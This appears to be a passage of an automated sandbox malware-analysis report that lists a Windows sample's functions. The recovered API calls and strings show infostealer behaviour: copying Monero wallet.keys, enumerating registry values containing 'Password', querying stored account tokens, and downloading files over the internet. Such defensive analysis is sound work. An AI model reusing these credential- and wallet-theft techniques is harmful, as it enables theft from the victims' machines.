                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: c70c546af7b4de396dab4d6b0b8b6ecc6ebfa35022c554208f3fc87db6fef346
                              • Instruction ID: cc92b50e89f7a161fdb302d5951729f5df107c635e7c4fef055194edbb85ccb1
                              • Opcode Fuzzy Hash: c70c546af7b4de396dab4d6b0b8b6ecc6ebfa35022c554208f3fc87db6fef346
                              • Instruction Fuzzy Hash: 4D713AB6910208ABDF24EBA0DC8AFEE7379AF48300F044599F505A7181EA74DB49DF91
                              Function 00C51310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C512A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C512B4
                                • Part of subcall function 00C512A0: RtlAllocateHeap.NTDLL(00000000), ref: 00C512BB
                                • Part of subcall function 00C512A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00C512D7
                                • Part of subcall function 00C512A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00C512F5
                                • Part of subcall function 00C512A0: RegCloseKey.ADVAPI32(?), ref: 00C512FF
                              • lstrcat.KERNEL32(?,00000000), ref: 00C5134F
                              • lstrlen.KERNEL32(?), ref: 00C5135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00C51377
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                                • Part of subcall function 00C68B60: GetSystemTime.KERNEL32(00C70E1A,007FA3F0,00C705AE,?,?,00C513F9,?,0000001A,00C70E1A,00000000,?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C68B86
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00C51465
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                                • Part of subcall function 00C599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C599EC
                                • Part of subcall function 00C599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C59A11
                                • Part of subcall function 00C599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C59A31
                                • Part of subcall function 00C599C0: ReadFile.KERNEL32(000000FF,?,00000000,00C5148F,00000000), ref: 00C59A5A
                                • Part of subcall function 00C599C0: LocalFree.KERNEL32(00C5148F), ref: 00C59A90
                                • Part of subcall function 00C599C0: CloseHandle.KERNEL32(000000FF), ref: 00C59A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 00C514EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: b5e2f133e745b3434f4948aeeee8ed10ca323f2cc2bb0c457fa630c637fa52c4
                              • Instruction ID: d4dabf03ea4a24ffa277c4ad043325e0aadd1a3da1660884a7371f93b528d362
                              • Opcode Fuzzy Hash: b5e2f133e745b3434f4948aeeee8ed10ca323f2cc2bb0c457fa630c637fa52c4
                              • Instruction Fuzzy Hash: D15132B19501185BCB25FB60DDD6BED737CAF54300F4041A9B60A72082EF306B89DFA6
                              Function 00C575D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C572D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C5733A
                                • Part of subcall function 00C572D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00C573B1
                                • Part of subcall function 00C572D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00C5740D
                                • Part of subcall function 00C572D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00C57452
                                • Part of subcall function 00C572D0: HeapFree.KERNEL32(00000000), ref: 00C57459
                              • lstrcat.KERNEL32(00000000,00C717FC), ref: 00C57606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00C57648
                              • lstrcat.KERNEL32(00000000, : ), ref: 00C5765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00C5768F
                              • lstrcat.KERNEL32(00000000,00C71804), ref: 00C576A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00C576D3
                              • lstrcat.KERNEL32(00000000,00C71808), ref: 00C576ED
                              • task.LIBCPMTD ref: 00C576FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: 4686e69fa734bc4e8246780cdab458b860d2e829744bb06b28c9740f2bb76716
                              • Instruction ID: 2af26f6e0d1e03d6def0e46ce9826229f853dce742d8b3726e58773737b5f748
                              • Opcode Fuzzy Hash: 4686e69fa734bc4e8246780cdab458b860d2e829744bb06b28c9740f2bb76716
                              • Instruction Fuzzy Hash: 48313075910109DFCB18EBB5DC8ADFF7374AF44302B18412AF502B7191DA34A98EDB95
                              Function 00C68100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,007FDFC0,00000000,?,00C70E2C,00000000,?,00000000), ref: 00C68130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C68137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00C68158
                              • __aulldiv.LIBCMT ref: 00C68172
                              • __aulldiv.LIBCMT ref: 00C68180
                              • wsprintfA.USER32 ref: 00C681AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
                              • Opcode ID: 227f6eb1cd82d9b2555574357d1ab7f9cf255a579778d509dc844d39cefa5f25
                              • Instruction ID: d7d43946bbae3c549e08363f81e2c56495e28e7ebd65e9ac867443210a7d0da8
                              • Opcode Fuzzy Hash: 227f6eb1cd82d9b2555574357d1ab7f9cf255a579778d509dc844d39cefa5f25
                              • Instruction Fuzzy Hash: D9214AB1E44218ABDB10DFD5CC89FAEB7B8FB44B00F10421AF605BB280D77869058BA5
                              Function 00C560A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                                • Part of subcall function 00C547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C54839
                                • Part of subcall function 00C547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C54849
                              • InternetOpenA.WININET(00C70DF7,00000001,00000000,00000000,00000000), ref: 00C5610F
                              • StrCmpCA.SHLWAPI(?,007FE758), ref: 00C56147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00C5618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00C561B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 00C561DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C5620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00C56249
                              • InternetCloseHandle.WININET(?), ref: 00C56253
                              • InternetCloseHandle.WININET(00000000), ref: 00C56260
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: 9677a1c309c1d6019ed1a4c9821b05923a0d646ec7ff432d925cfca5f79e0cb6
                              • Instruction ID: abcb3530c08e74321a85b6e36215385363b701d30c530b1260b50aa5a59b67d3
                              • Opcode Fuzzy Hash: 9677a1c309c1d6019ed1a4c9821b05923a0d646ec7ff432d925cfca5f79e0cb6
                              • Instruction Fuzzy Hash: B4517074A00208AFDB20DF91CC45BEE77B8EF04301F5081AAE605B71C1DB746A89CF99
                              Function 00C572D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C5733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00C573B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00C5740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00C57452
                              • HeapFree.KERNEL32(00000000), ref: 00C57459
                              • task.LIBCPMTD ref: 00C57555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: e16dd66b2b3c6124eff3ac49b5ea551d4f2acef9549beea8297f160dbd7f47c1
                              • Instruction ID: 40520e84742a144caec236e4ac4d4b2d313d2a7d0fcc6be549c11181ebfe881d
                              • Opcode Fuzzy Hash: e16dd66b2b3c6124eff3ac49b5ea551d4f2acef9549beea8297f160dbd7f47c1
                              • Instruction Fuzzy Hash: AA615DB58001189BDB24DB50DC45BDAB7B8BF44301F0081E9EA49A6141EF705FCDDFA5
                              Function 00C5BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                              • lstrlen.KERNEL32(00000000), ref: 00C5BC9F
                                • Part of subcall function 00C68E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C68E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 00C5BCCD
                              • lstrlen.KERNEL32(00000000), ref: 00C5BDA5
                              • lstrlen.KERNEL32(00000000), ref: 00C5BDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: beb1c0eb39ed00d5dc38e705a296c6722d6338ea13dda55fd2a6b2ae68087203
                              • Instruction ID: 417402254424048c2051dcad7cb779080bf639f913372ecc4c95174ce06aafcf
                              • Opcode Fuzzy Hash: beb1c0eb39ed00d5dc38e705a296c6722d6338ea13dda55fd2a6b2ae68087203
                              • Instruction Fuzzy Hash: 04B12C729101089BDB24FBA0CDD6EEE7778AF58300F544169F506B7092EF346A49DFA2
                              Function 00C66770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: c812d72069bf16afe07b7f0b3265d6549b0aebdaf81ceb0264c598c6f1ba6fbc
                              • Instruction ID: ac0c4341be5cfb9f8a5511a7dfd0470455a978e236a78068907012ea8ad661dd
                              • Opcode Fuzzy Hash: c812d72069bf16afe07b7f0b3265d6549b0aebdaf81ceb0264c598c6f1ba6fbc
                              • Instruction Fuzzy Hash: 8AF08230904209EFD3549FE2E90A72C7BB0FF04703F0801ABF609A6290D6704B81DBD6
                              Function 00C54FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00C54FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C54FD1
                              • InternetOpenA.WININET(00C70DDF,00000000,00000000,00000000,00000000), ref: 00C54FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00C55011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00C55041
                              • InternetCloseHandle.WININET(?), ref: 00C550B9
                              • InternetCloseHandle.WININET(?), ref: 00C550C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: c62a7a449057e8de25374cde1e59bdf33b9e1700839e297e9084494ab5f7f94e
                              • Instruction ID: 9e9428018cae257d70e3ccdba7fdb4d30deca79b0a5ea888737edca22f12393d
                              • Opcode Fuzzy Hash: c62a7a449057e8de25374cde1e59bdf33b9e1700839e297e9084494ab5f7f94e
                              • Instruction Fuzzy Hash: A631FEB4A002189BDB20CF55DC85BDDB7B4EB48704F1081EAEA0977281D7706AC58F99
                              Function 00C683DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00C68426
                              • wsprintfA.USER32 ref: 00C68459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00C6847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 00C6848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00C68499
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
